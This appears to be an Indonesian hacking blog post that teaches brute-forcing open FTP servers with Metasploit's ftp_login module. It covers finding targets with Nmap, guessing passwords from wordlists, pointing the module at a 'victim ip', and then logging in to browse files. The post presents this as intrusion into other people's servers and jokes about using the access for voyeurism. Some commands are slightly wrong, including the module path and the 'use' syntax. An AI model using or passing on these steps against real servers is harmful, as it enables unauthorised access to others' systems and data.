Udah lama g buat tutorial, ahirnya ada waktu juga hari ini :D
Kali ini ane bakal ngasih tutorial cara brute force open FTP menggunakan metasploit
Tingkat kesuksesan mencapai 100% jika wordlist ente tepat sasaran
Pertanyaan yang biasanya muncul :
1. Dapet Open FTP gimana caranya ?
- Silahkan lakukan scaning dengan tools di kali misalnya : Nmap / Zenmap
2. Membuat wordlist tepat sasaran gimana ?
- Gunakan Logika anda sebagai admin FTP tersebut, kira2 apa saja password yg mungkin dipakai ( Brute Force = Coba atu2 )
3. Kalau udah bisa masuk bisa ngapaen aja ?
- Bisa ngintipin Janda muda lagi mandi :v ( googling aje bang )
Oke langsung ke tutorialnya ( Tested On Kali Linux ) :
Ane asumsiin udah dapet target open FTP nye. Di tutorial ini ane ambil sampel dari kiriman Bang Kalvian Sofian di grup Kali Linux
step by step :
1. Open your metasploit, kemudian search modul ftp_login
2. Gunakan module auxiliary/scanner/ft/ftp_login dengan menambahkan use di awalnya sehingga menjadi : use module auxiliary/scanner/ft/ftp_login
3. Sekarang kita set wordlist untuk username & passwordnya. Disini ane narok wordlist username & password di Desktop dengan nama pw.txt & user.txt
sehingga comand yang ane type :
#set pass_file Desktop/pw.txt
#set user_file Desktop/user.txt
3. Langkah selanjutnya kita set rhosts nya
#set rhosts victim ip
4. next type run
Berhubung wordlist ane asal – asalan jadinya incorect semua dah …
ahahahahahhaha …..
kalo sukses login ntar bakal ada bacaan suksesnya, tinggal buka terminal kemudian
#ftp victim ip trus masukin user ama passwordnya tadi
Kalau mau lihat directory, subdirectory, permision acces tinggal ketik
#ls -lat
Sekian dulu tutorial abal – abal dari ane, semoga bisa bermanfaat bagi kita semua …
Kalo ada yang kurang monggo ditambahin, tp jangan lupa credit nya jangan di hilangkan :D
Just Learning Not Teaching ….
Salam Biawak X Code
Tidak ada komentar